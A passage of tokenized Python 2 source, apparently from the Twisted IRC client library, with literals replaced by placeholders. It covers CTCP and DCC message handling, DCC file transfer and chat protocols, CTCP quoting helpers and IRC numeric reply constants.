data ) : <EOL> """<STR_LIT>""" <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> if not data : <EOL> names = reflect . prefixedMethodNames ( self . __class__ , <EOL> '<STR_LIT>' ) <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> string . join ( names , '<STR_LIT:U+0020>' ) ) ] ) <EOL> else : <EOL> args = string . 
split ( data ) <EOL> method = getattr ( self , '<STR_LIT>' % ( args [ <NUM_LIT:0> ] , ) , None ) <EOL> if not method : <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( data , args [ <NUM_LIT:0> ] ) ) ] ) <EOL> return <EOL> doc = getattr ( method , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , doc ) ] ) <EOL> def ctcpQuery_ERRMSG ( self , user , channel , data ) : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> "<STR_LIT>" % data ) ] ) <EOL> def ctcpQuery_TIME ( self , user , channel , data ) : <EOL> if data is not None : <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , data ) ) <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , <EOL> [ ( '<STR_LIT>' , '<STR_LIT>' % <EOL> time . asctime ( time . localtime ( time . time ( ) ) ) ) ] ) <EOL> def ctcpQuery_DCC ( self , user , channel , data ) : <EOL> """<STR_LIT>""" <EOL> if not data : return <EOL> dcctype = data . split ( None , <NUM_LIT:1> ) [ <NUM_LIT:0> ] . upper ( ) <EOL> handler = getattr ( self , "<STR_LIT>" + dcctype , None ) <EOL> if handler : <EOL> if self . dcc_sessions is None : <EOL> self . dcc_sessions = [ ] <EOL> data = data [ len ( dcctype ) + <NUM_LIT:1> : ] <EOL> handler ( user , channel , data ) <EOL> else : <EOL> nick = string . split ( user , "<STR_LIT:!>" ) [ <NUM_LIT:0> ] <EOL> self . ctcpMakeReply ( nick , [ ( '<STR_LIT>' , <EOL> "<STR_LIT>" <EOL> % ( data , dcctype ) ) ] ) <EOL> self . quirkyMessage ( "<STR_LIT>" <EOL> % ( user , dcctype ) ) <EOL> def dcc_SEND ( self , user , channel , data ) : <EOL> data = text . 
splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , address , port ) = data [ : <NUM_LIT:3> ] <EOL> address = dccParseAddress ( address ) <EOL> try : <EOL> port = int ( port ) <EOL> except ValueError : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( port , ) <EOL> size = - <NUM_LIT:1> <EOL> if len ( data ) >= <NUM_LIT:4> : <EOL> try : <EOL> size = int ( data [ <NUM_LIT:3> ] ) <EOL> except ValueError : <EOL> pass <EOL> self . dccDoSend ( user , address , port , filename , size , data ) <EOL> def dcc_ACCEPT ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , port , resumePos ) = data [ : <NUM_LIT:3> ] <EOL> try : <EOL> port = int ( port ) <EOL> resumePos = int ( resumePos ) <EOL> except ValueError : <EOL> return <EOL> self . dccDoAcceptResume ( user , filename , port , resumePos ) <EOL> def dcc_RESUME ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , port , resumePos ) = data [ : <NUM_LIT:3> ] <EOL> try : <EOL> port = int ( port ) <EOL> resumePos = int ( resumePos ) <EOL> except ValueError : <EOL> return <EOL> self . dccDoResume ( user , filename , port , resumePos ) <EOL> def dcc_CHAT ( self , user , channel , data ) : <EOL> data = text . splitQuoted ( data ) <EOL> if len ( data ) < <NUM_LIT:3> : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( data , ) <EOL> ( filename , address , port ) = data [ : <NUM_LIT:3> ] <EOL> address = dccParseAddress ( address ) <EOL> try : <EOL> port = int ( port ) <EOL> except ValueError : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( port , ) <EOL> self . 
dccDoChat ( user , channel , address , port , data ) <EOL> def dccDoSend ( self , user , address , port , fileName , size , data ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dccDoResume ( self , user , file , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dccDoAcceptResume ( self , user , file , port , resumePos ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def dccDoChat ( self , user , channel , address , port , data ) : <EOL> pass <EOL> def ctcpMakeReply ( self , user , messages ) : <EOL> """<STR_LIT>""" <EOL> self . notice ( user , ctcpStringify ( messages ) ) <EOL> def ctcpMakeQuery ( self , user , messages ) : <EOL> """<STR_LIT>""" <EOL> self . msg ( user , ctcpStringify ( messages ) ) <EOL> def ctcpReply ( self , user , channel , messages ) : <EOL> """<STR_LIT>""" <EOL> for m in messages : <EOL> method = getattr ( self , "<STR_LIT>" % m [ <NUM_LIT:0> ] , None ) <EOL> if method : <EOL> method ( user , channel , m [ <NUM_LIT:1> ] ) <EOL> else : <EOL> self . ctcpUnknownReply ( user , channel , m [ <NUM_LIT:0> ] , m [ <NUM_LIT:1> ] ) <EOL> def ctcpReply_PING ( self , user , channel , data ) : <EOL> nick = user . split ( '<STR_LIT:!>' , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> if ( not self . _pings ) or ( not self . _pings . has_key ( ( nick , data ) ) ) : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( user , data ) <EOL> t0 = self . _pings [ ( nick , data ) ] <EOL> self . pong ( user , time . time ( ) - t0 ) <EOL> def ctcpUnknownReply ( self , user , channel , tag , data ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( "<STR_LIT>" <EOL> % ( user , tag , data ) ) <EOL> def badMessage ( self , line , excType , excValue , tb ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( line ) <EOL> log . msg ( string . join ( traceback . format_exception ( excType , <EOL> excValue , <EOL> tb ) , '<STR_LIT>' ) ) <EOL> def quirkyMessage ( self , s ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( s + '<STR_LIT:\n>' ) <EOL> def connectionMade ( self ) : <EOL> self . 
supported = ServerSupportedFeatures ( ) <EOL> self . _queue = [ ] <EOL> if self . performLogin : <EOL> self . register ( self . nickname ) <EOL> def dataReceived ( self , data ) : <EOL> basic . LineReceiver . dataReceived ( self , data . replace ( '<STR_LIT:\r>' , '<STR_LIT>' ) ) <EOL> def lineReceived ( self , line ) : <EOL> line = lowDequote ( line ) <EOL> try : <EOL> prefix , command , params = parsemsg ( line ) <EOL> if command in numeric_to_symbolic : <EOL> command = numeric_to_symbolic [ command ] <EOL> self . handleCommand ( command , prefix , params ) <EOL> except IRCBadMessage : <EOL> self . badMessage ( line , * sys . exc_info ( ) ) <EOL> def getUserModeParams ( self ) : <EOL> """<STR_LIT>""" <EOL> return [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def getChannelModeParams ( self ) : <EOL> """<STR_LIT>""" <EOL> params = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> prefixes = self . supported . getFeature ( '<STR_LIT>' , { } ) <EOL> params [ <NUM_LIT:0> ] = params [ <NUM_LIT:1> ] = '<STR_LIT>' . join ( prefixes . iterkeys ( ) ) <EOL> chanmodes = self . supported . getFeature ( '<STR_LIT>' ) <EOL> if chanmodes is not None : <EOL> params [ <NUM_LIT:0> ] += chanmodes . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> params [ <NUM_LIT:0> ] += chanmodes . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> params [ <NUM_LIT:1> ] = params [ <NUM_LIT:0> ] <EOL> params [ <NUM_LIT:0> ] += chanmodes . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return params <EOL> def handleCommand ( self , command , prefix , params ) : <EOL> """<STR_LIT>""" <EOL> method = getattr ( self , "<STR_LIT>" % command , None ) <EOL> try : <EOL> if method is not None : <EOL> method ( prefix , params ) <EOL> else : <EOL> self . irc_unknown ( prefix , command , params ) <EOL> except : <EOL> log . deferr ( ) <EOL> def __getstate__ ( self ) : <EOL> dct = self . __dict__ . 
copy ( ) <EOL> dct [ '<STR_LIT>' ] = None <EOL> dct [ '<STR_LIT>' ] = None <EOL> return dct <EOL> def dccParseAddress ( address ) : <EOL> if '<STR_LIT:.>' in address : <EOL> pass <EOL> else : <EOL> try : <EOL> address = long ( address ) <EOL> except ValueError : <EOL> raise IRCBadMessage , "<STR_LIT>" % ( address , ) <EOL> else : <EOL> address = ( <EOL> ( address >> <NUM_LIT> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:16> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:8> ) & <NUM_LIT> , <EOL> address & <NUM_LIT> , <EOL> ) <EOL> address = '<STR_LIT:.>' . join ( map ( str , address ) ) <EOL> return address <EOL> class DccFileReceiveBasic ( protocol . Protocol , styles . Ephemeral ) : <EOL> """<STR_LIT>""" <EOL> bytesReceived = <NUM_LIT:0> <EOL> def __init__ ( self , resumeOffset = <NUM_LIT:0> ) : <EOL> self . bytesReceived = resumeOffset <EOL> self . resume = ( resumeOffset != <NUM_LIT:0> ) <EOL> def dataReceived ( self , data ) : <EOL> """<STR_LIT>""" <EOL> self . bytesReceived = self . bytesReceived + len ( data ) <EOL> self . transport . write ( struct . pack ( '<STR_LIT>' , self . bytesReceived ) ) <EOL> class DccSendProtocol ( protocol . Protocol , styles . Ephemeral ) : <EOL> """<STR_LIT>""" <EOL> blocksize = <NUM_LIT> <EOL> file = None <EOL> bytesSent = <NUM_LIT:0> <EOL> completed = <NUM_LIT:0> <EOL> connected = <NUM_LIT:0> <EOL> def __init__ ( self , file ) : <EOL> if type ( file ) is types . StringType : <EOL> self . file = open ( file , '<STR_LIT:r>' ) <EOL> def connectionMade ( self ) : <EOL> self . connected = <NUM_LIT:1> <EOL> self . sendBlock ( ) <EOL> def dataReceived ( self , data ) : <EOL> bytesShesGot = struct . unpack ( "<STR_LIT>" , data ) <EOL> if bytesShesGot < self . bytesSent : <EOL> return <EOL> elif bytesShesGot > self . bytesSent : <EOL> self . transport . loseConnection ( ) <EOL> return <EOL> self . sendBlock ( ) <EOL> def sendBlock ( self ) : <EOL> block = self . file . read ( self . blocksize ) <EOL> if block : <EOL> self . transport . 
write ( block ) <EOL> self . bytesSent = self . bytesSent + len ( block ) <EOL> else : <EOL> self . transport . loseConnection ( ) <EOL> self . completed = <NUM_LIT:1> <EOL> def connectionLost ( self , reason ) : <EOL> self . connected = <NUM_LIT:0> <EOL> if hasattr ( self . file , "<STR_LIT>" ) : <EOL> self . file . close ( ) <EOL> class DccSendFactory ( protocol . Factory ) : <EOL> protocol = DccSendProtocol <EOL> def __init__ ( self , file ) : <EOL> self . file = file <EOL> def buildProtocol ( self , connection ) : <EOL> p = self . protocol ( self . file ) <EOL> p . factory = self <EOL> return p <EOL> def fileSize ( file ) : <EOL> """<STR_LIT>""" <EOL> size = None <EOL> if hasattr ( file , "<STR_LIT>" ) : <EOL> fileno = file . fileno ( ) <EOL> try : <EOL> stat_ = os . fstat ( fileno ) <EOL> size = stat_ [ stat . ST_SIZE ] <EOL> except : <EOL> pass <EOL> else : <EOL> return size <EOL> if hasattr ( file , "<STR_LIT:name>" ) and path . exists ( file . name ) : <EOL> try : <EOL> size = path . getsize ( file . name ) <EOL> except : <EOL> pass <EOL> else : <EOL> return size <EOL> if hasattr ( file , "<STR_LIT>" ) and hasattr ( file , "<STR_LIT>" ) : <EOL> try : <EOL> try : <EOL> file . seek ( <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> size = file . tell ( ) <EOL> finally : <EOL> file . seek ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> except : <EOL> pass <EOL> else : <EOL> return size <EOL> return size <EOL> class DccChat ( basic . LineReceiver , styles . Ephemeral ) : <EOL> """<STR_LIT>""" <EOL> queryData = None <EOL> delimiter = CR + NL <EOL> client = None <EOL> remoteParty = None <EOL> buffer = "<STR_LIT>" <EOL> def __init__ ( self , client , queryData = None ) : <EOL> """<STR_LIT>""" <EOL> self . client = client <EOL> if queryData : <EOL> self . queryData = queryData <EOL> self . remoteParty = self . queryData [ <NUM_LIT:0> ] <EOL> def dataReceived ( self , data ) : <EOL> self . buffer = self . buffer + data <EOL> lines = string . split ( self . buffer , LF ) <EOL> self . 
buffer = lines . pop ( ) <EOL> for line in lines : <EOL> if line [ - <NUM_LIT:1> ] == CR : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> self . lineReceived ( line ) <EOL> def lineReceived ( self , line ) : <EOL> log . msg ( "<STR_LIT>" % ( self . remoteParty , line ) ) <EOL> self . client . privmsg ( self . remoteParty , <EOL> self . client . nickname , line ) <EOL> class DccChatFactory ( protocol . ClientFactory ) : <EOL> protocol = DccChat <EOL> noisy = <NUM_LIT:0> <EOL> def __init__ ( self , client , queryData ) : <EOL> self . client = client <EOL> self . queryData = queryData <EOL> def buildProtocol ( self , addr ) : <EOL> p = self . protocol ( client = self . client , queryData = self . queryData ) <EOL> p . factory = self <EOL> return p <EOL> def clientConnectionFailed ( self , unused_connector , unused_reason ) : <EOL> self . client . dcc_sessions . remove ( self ) <EOL> def clientConnectionLost ( self , unused_connector , unused_reason ) : <EOL> self . client . dcc_sessions . remove ( self ) <EOL> def dccDescribe ( data ) : <EOL> """<STR_LIT>""" <EOL> orig_data = data <EOL> data = string . split ( data ) <EOL> if len ( data ) < <NUM_LIT:4> : <EOL> return orig_data <EOL> ( dcctype , arg , address , port ) = data [ : <NUM_LIT:4> ] <EOL> if '<STR_LIT:.>' in address : <EOL> pass <EOL> else : <EOL> try : <EOL> address = long ( address ) <EOL> except ValueError : <EOL> pass <EOL> else : <EOL> address = ( <EOL> ( address >> <NUM_LIT> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:16> ) & <NUM_LIT> , <EOL> ( address >> <NUM_LIT:8> ) & <NUM_LIT> , <EOL> address & <NUM_LIT> , <EOL> ) <EOL> address = string . 
join ( map ( str , map ( int , address ) ) , "<STR_LIT:.>" ) <EOL> if dcctype == '<STR_LIT>' : <EOL> filename = arg <EOL> size_txt = '<STR_LIT>' <EOL> if len ( data ) >= <NUM_LIT:5> : <EOL> try : <EOL> size = int ( data [ <NUM_LIT:4> ] ) <EOL> size_txt = '<STR_LIT>' % ( size , ) <EOL> except ValueError : <EOL> pass <EOL> dcc_text = ( "<STR_LIT>" <EOL> % ( filename , size_txt , address , port ) ) <EOL> elif dcctype == '<STR_LIT>' : <EOL> dcc_text = ( "<STR_LIT>" <EOL> % ( address , port ) ) <EOL> else : <EOL> dcc_text = orig_data <EOL> return dcc_text <EOL> class DccFileReceive ( DccFileReceiveBasic ) : <EOL> """<STR_LIT>""" <EOL> filename = '<STR_LIT>' <EOL> fileSize = - <NUM_LIT:1> <EOL> destDir = '<STR_LIT:.>' <EOL> overwrite = <NUM_LIT:0> <EOL> fromUser = None <EOL> queryData = None <EOL> def __init__ ( self , filename , fileSize = - <NUM_LIT:1> , queryData = None , <EOL> destDir = '<STR_LIT:.>' , resumeOffset = <NUM_LIT:0> ) : <EOL> DccFileReceiveBasic . __init__ ( self , resumeOffset = resumeOffset ) <EOL> self . filename = filename <EOL> self . destDir = destDir <EOL> self . fileSize = fileSize <EOL> if queryData : <EOL> self . queryData = queryData <EOL> self . fromUser = self . queryData [ <NUM_LIT:0> ] <EOL> def set_directory ( self , directory ) : <EOL> """<STR_LIT>""" <EOL> if not path . exists ( directory ) : <EOL> raise OSError ( errno . ENOENT , "<STR_LIT>" , <EOL> directory ) <EOL> if not path . isdir ( directory ) : <EOL> raise OSError ( errno . ENOTDIR , "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> directory ) <EOL> if not os . access ( directory , os . X_OK | os . W_OK ) : <EOL> raise OSError ( errno . EACCES , <EOL> "<STR_LIT>" , <EOL> directory ) <EOL> self . destDir = directory <EOL> def set_filename ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> self . filename = filename <EOL> def set_overwrite ( self , boolean ) : <EOL> """<STR_LIT>""" <EOL> self . overwrite = boolean <EOL> def connectionMade ( self ) : <EOL> dst = path . abspath ( path . 
join ( self . destDir , self . filename ) ) <EOL> exists = path . exists ( dst ) <EOL> if self . resume and exists : <EOL> self . file = open ( dst , '<STR_LIT>' ) <EOL> log . msg ( "<STR_LIT>" % <EOL> ( self . file , self . file . tell ( ) ) ) <EOL> elif self . overwrite or not exists : <EOL> self . file = open ( dst , '<STR_LIT:wb>' ) <EOL> else : <EOL> raise OSError ( errno . EEXIST , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> dst ) <EOL> def dataReceived ( self , data ) : <EOL> self . file . write ( data ) <EOL> DccFileReceiveBasic . dataReceived ( self , data ) <EOL> def connectionLost ( self , reason ) : <EOL> """<STR_LIT>""" <EOL> self . connected = <NUM_LIT:0> <EOL> logmsg = ( "<STR_LIT>" % ( self , ) ) <EOL> if self . fileSize > <NUM_LIT:0> : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , self . bytesReceived , self . fileSize ) ) <EOL> if self . bytesReceived == self . fileSize : <EOL> pass <EOL> elif self . bytesReceived < self . fileSize : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , self . fileSize - self . bytesReceived ) ) <EOL> else : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , ) ) <EOL> else : <EOL> logmsg = ( "<STR_LIT>" <EOL> % ( logmsg , self . bytesReceived ) ) <EOL> if hasattr ( self , '<STR_LIT:file>' ) : <EOL> logmsg = "<STR_LIT>" % ( logmsg , self . file . name ) <EOL> if hasattr ( self . file , '<STR_LIT>' ) : self . file . close ( ) <EOL> def __str__ ( self ) : <EOL> if not self . connected : <EOL> return "<STR_LIT>" % ( id ( self ) , ) <EOL> from_ = self . transport . getPeer ( ) <EOL> if self . fromUser : <EOL> from_ = "<STR_LIT>" % ( self . fromUser , from_ ) <EOL> s = ( "<STR_LIT>" % ( self . filename , from_ ) ) <EOL> return s <EOL> def __repr__ ( self ) : <EOL> s = ( "<STR_LIT>" <EOL> % ( self . __class__ , id ( self ) , self . 
filename ) ) <EOL> return s <EOL> X_DELIM = chr ( <NUM_LIT> <NUM_LIT:1> ) <EOL> def ctcpExtract ( message ) : <EOL> """<STR_LIT>""" <EOL> extended_messages = [ ] <EOL> normal_messages = [ ] <EOL> retval = { '<STR_LIT>' : extended_messages , <EOL> '<STR_LIT>' : normal_messages } <EOL> messages = string . split ( message , X_DELIM ) <EOL> odd = <NUM_LIT:0> <EOL> while messages : <EOL> if odd : <EOL> extended_messages . append ( messages . pop ( <NUM_LIT:0> ) ) <EOL> else : <EOL> normal_messages . append ( messages . pop ( <NUM_LIT:0> ) ) <EOL> odd = not odd <EOL> extended_messages [ : ] = filter ( None , extended_messages ) <EOL> normal_messages [ : ] = filter ( None , normal_messages ) <EOL> extended_messages [ : ] = map ( ctcpDequote , extended_messages ) <EOL> for i in xrange ( len ( extended_messages ) ) : <EOL> m = string . split ( extended_messages [ i ] , SPC , <NUM_LIT:1> ) <EOL> tag = m [ <NUM_LIT:0> ] <EOL> if len ( m ) > <NUM_LIT:1> : <EOL> data = m [ <NUM_LIT:1> ] <EOL> else : <EOL> data = None <EOL> extended_messages [ i ] = ( tag , data ) <EOL> return retval <EOL> M_QUOTE = chr ( <NUM_LIT:0> <NUM_LIT:20> ) <EOL> mQuoteTable = { <EOL> NUL : M_QUOTE + '<STR_LIT:0>' , <EOL> NL : M_QUOTE + '<STR_LIT:n>' , <EOL> CR : M_QUOTE + '<STR_LIT:r>' , <EOL> M_QUOTE : M_QUOTE + M_QUOTE <EOL> } <EOL> mDequoteTable = { } <EOL> for k , v in mQuoteTable . items ( ) : <EOL> mDequoteTable [ v [ - <NUM_LIT:1> ] ] = k <EOL> del k , v <EOL> mEscape_re = re . compile ( '<STR_LIT>' % ( re . escape ( M_QUOTE ) , ) , re . DOTALL ) <EOL> def lowQuote ( s ) : <EOL> for c in ( M_QUOTE , NUL , NL , CR ) : <EOL> s = string . replace ( s , c , mQuoteTable [ c ] ) <EOL> return s <EOL> def lowDequote ( s ) : <EOL> def sub ( matchobj , mDequoteTable = mDequoteTable ) : <EOL> s = matchobj . group ( ) [ <NUM_LIT:1> ] <EOL> try : <EOL> s = mDequoteTable [ s ] <EOL> except KeyError : <EOL> s = s <EOL> return s <EOL> return mEscape_re . 
sub ( sub , s ) <EOL> X_QUOTE = '<STR_LIT:\\>' <EOL> xQuoteTable = { <EOL> X_DELIM : X_QUOTE + '<STR_LIT:a>' , <EOL> X_QUOTE : X_QUOTE + X_QUOTE <EOL> } <EOL> xDequoteTable = { } <EOL> for k , v in xQuoteTable . items ( ) : <EOL> xDequoteTable [ v [ - <NUM_LIT:1> ] ] = k <EOL> xEscape_re = re . compile ( '<STR_LIT>' % ( re . escape ( X_QUOTE ) , ) , re . DOTALL ) <EOL> def ctcpQuote ( s ) : <EOL> for c in ( X_QUOTE , X_DELIM ) : <EOL> s = string . replace ( s , c , xQuoteTable [ c ] ) <EOL> return s <EOL> def ctcpDequote ( s ) : <EOL> def sub ( matchobj , xDequoteTable = xDequoteTable ) : <EOL> s = matchobj . group ( ) [ <NUM_LIT:1> ] <EOL> try : <EOL> s = xDequoteTable [ s ] <EOL> except KeyError : <EOL> s = s <EOL> return s <EOL> return xEscape_re . sub ( sub , s ) <EOL> def ctcpStringify ( messages ) : <EOL> """<STR_LIT>""" <EOL> coded_messages = [ ] <EOL> for ( tag , data ) in messages : <EOL> if data : <EOL> if not isinstance ( data , types . StringType ) : <EOL> try : <EOL> data = "<STR_LIT:U+0020>" . join ( map ( str , data ) ) <EOL> except TypeError : <EOL> pass <EOL> m = "<STR_LIT>" % ( tag , data ) <EOL> else : <EOL> m = str ( tag ) <EOL> m = ctcpQuote ( m ) <EOL> m = "<STR_LIT>" % ( X_DELIM , m , X_DELIM ) <EOL> coded_messages . append ( m ) <EOL> line = string . 
join ( coded_messages , '<STR_LIT>' ) <EOL> return line <EOL> RPL_WELCOME = '<STR_LIT>' <EOL> RPL_YOURHOST = '<STR_LIT>' <EOL> RPL_CREATED = '<STR_LIT>' <EOL> RPL_MYINFO = '<STR_LIT>' <EOL> RPL_ISUPPORT = '<STR_LIT>' <EOL> RPL_BOUNCE = '<STR_LIT>' <EOL> RPL_USERHOST = '<STR_LIT>' <EOL> RPL_ISON = '<STR_LIT>' <EOL> RPL_AWAY = '<STR_LIT>' <EOL> RPL_UNAWAY = '<STR_LIT>' <EOL> RPL_NOWAWAY = '<STR_LIT>' <EOL> RPL_WHOISUSER = '<STR_LIT>' <EOL> RPL_WHOISSERVER = '<STR_LIT>' <EOL> RPL_WHOISOPERATOR = '<STR_LIT>' <EOL> RPL_WHOISIDLE = '<STR_LIT>' <EOL> RPL_ENDOFWHOIS = '<STR_LIT>' <EOL> RPL_WHOISCHANNELS = '<STR_LIT>' <EOL> RPL_WHOWASUSER = '<STR_LIT>' <EOL> RPL_ENDOFWHOWAS = '<STR_LIT>' <EOL> RPL_LISTSTART = '<STR_LIT>' <EOL> RPL_LIST = '<STR_LIT>' <EOL> RPL_LISTEND = '<STR_LIT>' <EOL> RPL_UNIQOPIS = '<STR_LIT>' <EOL> RPL_CHANNELMODEIS = '<STR_LIT>' <EOL> RPL_NOTOPIC = '<STR_LIT>' <EOL> RPL_TOPIC = '<STR_LIT>' <EOL> RPL_INVITING = '<STR_LIT>' <EOL> RPL_SUMMONING = '<STR_LIT>' <EOL> RPL_INVITELIST = '<STR_LIT>' <EOL> RPL_ENDOFINVITELIST = '<STR_LIT>' <EOL> RPL_EXCEPTLIST = '<STR_LIT>' <EOL> RPL_ENDOFEXCEPTLIST = '<STR_LIT>' <EOL> RPL_VERSION = '<STR_LIT>' <EOL> RPL_WHOREPLY = '<STR_LIT>' <EOL> RPL_ENDOFWHO = '<STR_LIT>' <EOL> RPL_NAMREPLY = '<STR_LIT>' <EOL> RPL_ENDOFNAMES = '<STR_LIT>' <EOL> RPL_LINKS = '<STR_LIT>' <EOL> RPL_ENDOFLINKS = '<STR_LIT>' <EOL> RPL_BANLIST = '<STR_LIT>' <EOL> RPL_ENDOFBANLIST = '<STR_LIT>' <EOL> RPL_INFO = '<STR_LIT>' <EOL> RPL_ENDOFINFO = '<STR_LIT>' <EOL> RPL_MOTDSTART = '<STR_LIT>' <EOL> RPL_MOTD = '<STR_LIT>' <EOL> RPL_ENDOFMOTD = '<STR_LIT>' <EOL> RPL_YOUREOPER = '<STR_LIT>' <EOL> RPL_REHASHING = '<STR_LIT>' <EOL> RPL_YOURESERVICE = '<STR_LIT>' <EOL> RPL_TIME = '<STR_LIT>' <EOL> RPL_USERSSTART = '<STR_LIT>' <EOL> RPL_USERS = '<STR_LIT>' <EOL> RPL_ENDOFUSERS = '<STR_LIT>' <EOL> RPL_NOUSERS = '<STR_LIT>' <EOL> RPL_TRACELINK = '<STR_LIT>' <EOL> RPL_TRACECONNECTING = '<STR_LIT>' <EOL> RPL_TRACEHANDSHAKE = '<STR_LIT>' <EOL> RPL_TRACEUNKNOWN = 
'<STR_LIT>' <EOL> RPL_TRACEOPERATOR = '<STR_LIT>' <EOL> RPL_TRACEUSER = '<STR_LIT>' <EOL> RPL_TRACESERVER = '<STR_LIT>' <EOL> RPL_TRACESERVICE = '<STR_LIT>' <EOL> RPL_TRACENEWTYPE = '<STR_LIT>' <EOL> RPL_TRACECLASS = '<STR_LIT>' <EOL> RPL_TRACERECONNECT = '<STR_LIT>' <EOL> RPL_TRACELOG = '<STR_LIT>' <EOL> RPL_TRACEEND = '<STR_LIT>' <EOL> RPL_STATSLINKINFO = '<STR_LIT>' <EOL> RPL_STATSCOMMANDS = '<STR_LIT>' <EOL> RPL_ENDOFSTATS = '<STR_LIT>' <EOL> RPL_STATSUPTIME = '<STR_LIT>' <EOL> RPL_STATSOLINE = '<STR_LIT>' <EOL> RPL_UMODEIS = '<STR_LIT>' <EOL> RPL_SERVLIST = '<STR_LIT>' <EOL> RPL_SERVLISTEND = '<STR_LIT>' <EOL> RPL_LUSERCLIENT = '<STR_LIT>' <EOL> RPL_LUSEROP = '<STR_LIT>' <EOL> RPL_LUSERUNKNOWN = '<STR_LIT>' <EOL> RPL_LUSERCHANNELS = '<STR_LIT>' <EOL> RPL_LUSERME = '<STR_LIT>' <EOL> RPL_ADMINME = '<STR_LIT>' <EOL> RPL_ADMINLOC = '<STR_LIT>' <EOL> RPL_ADMINLOC = '<STR_LIT>' <EOL> RPL_ADMINEMAIL = '<STR_LIT>' <EOL> RPL_TRYAGAIN = '<STR_LIT>' <EOL> ERR_NOSUCHNICK = '<STR_LIT>' <EOL> ERR_NOSUCHSERVER = '<STR_LIT>' <EOL> ERR_NOSUCHCHANNEL = '<STR_LIT>' <EOL> ERR_CANNOTSENDTOCHAN = '<STR_LIT>' <EOL> ERR_TOOMANYCHANNELS = '<STR_LIT>' <EOL> ERR_WASNOSUCHNICK = '<STR_LIT>' <EOL> ERR_TOOMANYTARGETS = '<STR_LIT>' <EOL> ERR_NOSUCHSERVICE = '<STR_LIT>' <EOL> ERR_NOORIGIN = '<STR_LIT>' <EOL> ERR_NORECIPIENT = '<STR_LIT>' <EOL> ERR_NOTEXTTOSEND = '<STR_LIT>' <EOL> ERR_NOTOPLEVEL = '<STR_LIT>' <EOL> ERR_WILDTOPLEVEL = '<STR_LIT>' <EOL> ERR_BADMASK = '<STR_LIT>' <EOL> ERR_UNKNOWNCOMMAND = '<STR_LIT>' <EOL> ERR_NOMOTD = '<STR_LIT>' <EOL> ERR_NOADMININFO = '<STR_LIT>' <EOL> ERR_FILEERROR = '<STR_LIT>' <EOL> ERR_NONICKNAMEGIVEN = '<STR_LIT>' <EOL> ERR_ERRONEUSNICKNAME = '<STR_LIT>' <EOL> ERR_NICKNAMEINUSE = '<STR_LIT>' <EOL> ERR_NICKCOLLISION = '<STR_LIT>' <EOL> ERR_UNAVAILRESOURCE = '<STR_LIT>' <EOL> ERR_USERNOTINCHANNEL = '<STR_LIT>' <EOL> ERR_NOTONCHANNEL = '<STR_LIT>' <EOL> ERR_USERONCHANNEL = '<STR_LIT>' <EOL> ERR_NOLOGIN = '<STR_LIT>' <EOL> ERR_SUMMONDISABLED = '<STR_LIT>' 
